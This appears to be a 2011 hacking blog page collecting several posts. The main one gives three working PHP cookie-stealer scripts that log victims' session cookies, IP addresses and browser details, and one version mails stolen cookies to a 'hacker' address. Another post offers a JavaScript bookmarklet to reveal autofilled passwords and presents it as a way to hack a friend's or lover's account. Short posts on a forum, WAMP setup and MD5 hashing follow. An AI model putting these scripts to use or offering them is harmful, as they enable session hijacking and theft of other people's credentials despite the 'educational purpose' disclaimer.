Showing posts with label Programming. Show all posts
Showing posts with label Programming. Show all posts

Thursday, September 29, 2011

How to create cookie stealer Coding in PHP?~ get via email


Here is the simple Cookie Stealer code:
Cookie stored in File:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\\n");
fclose($steal);
?>
$cookie = $HTTP_GET_VARS["cookie"]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable.

$steal = fopen("cookiefile.txt", "a"); This open the cookiefile in append mode so that we can append the stolen cookie.

fwrite($steal, $cookie ."\\n"); This will store the stolen cookie inside the file.

fclose($steal); close the opened file.

Another version: Sends cookies to the hacker mail 
<?php
$cookie = $HTTP_GET_VARS["cookie"]; mail("hackerid@mailprovider.com", "Stolen Cookies", $cookie);
?>
The above code will mail the cookies to hacker mail using the PHP() mail function with subject "Stolen cookies".

Third Version
<?php
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}
function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
    fclose($log);
}
logData();
?>
 The above Cookie stealer will store the following information:
  • Ip address
  • port number
  • host(usually computer-name)
  • user agent
  • cookie

This Article is for Educational purpose only, written for Ethical Hackers. This article is for creating public awareness about the Internet Risks.
Continue   Reading>>

Tuesday, July 19, 2011

Ethical Hackers Forum Launched- Join us


Update:
The forum is deleted becoz we are not able to maintain it.

--
Hi BTS readers, We are proud to say our Ethical Hackers, programmers Forum is launched now.  Join with us now.

Our forum's page rank is 2.

Our forum is mainly concerned with two parts:
  1. Programming(My Favorite part)
  2. Hacking and Security(Our Favorite Part)
Programming:
If you are developer, then this section is for you.  Start discuss about your favorite programming language now.

Hacking and Security:
We know that it is necessary to know about hacking in order to provide security for your system and organisation.  This section will guide to computer security.

What are you waiting for?

Continue   Reading>>

Wednesday, July 13, 2011

How to run php files using wamp server?


Let me explain today how to use the wamp server to run the PHP files.  First of all download the Latest wamp server from here:
http://www.wampserver.com/
and install the server.

Continue   Reading>>

Monday, March 7, 2011

How to see the remembered passwords | passwords autofill Cracked



I am going to teach you how to see the passwords which are shown as astersik characters(*).

What is the use?

if your friend/lover select the remember passwords option when login,then you got the chance to hack their password without much effort(no need of phishing ).


Two cases:

Case I: 
if they select remember password in mozilla popup. It is easy to see the password using this method:How to see the saved passwords in mozilla?

Second I:
If the select remember passwords in login form , here is the another method.

How to see the remembered passwords ?
 Whenever someone select remember password in login form,the passwords will be automatically filled.  But the problem is that we can login but can not see the password.  Because the password will be shown as "astersik characters"(*).  Her e is the trick to crack that also.

Visit any site which remembers passwords and show astersik characters in password box.

Copy the following code
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();
Paste in the address bar.
Press enter key
Now the hidden password behind the astersik character will be shown.


Tutorial With Example Picture:
Lets take the yahoomail.com
if the password is auto filled as shown in the picture, then this method will work for you.





Continue   Reading>>

Sunday, February 27, 2011

MD5 Hash Code for PHP Developers


Hi friends, This post is especially for PHP Developers.  I hope you know about MD5.  If you  do not know,please read the following articles:
Introduction to MD5 Hash Code
MD5 Hash code creation for Java Developers

Like Java, php also have build in function named as "md5" for creating Hash code.

Continue   Reading>>
Older Post Home
 

© Break The Security. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com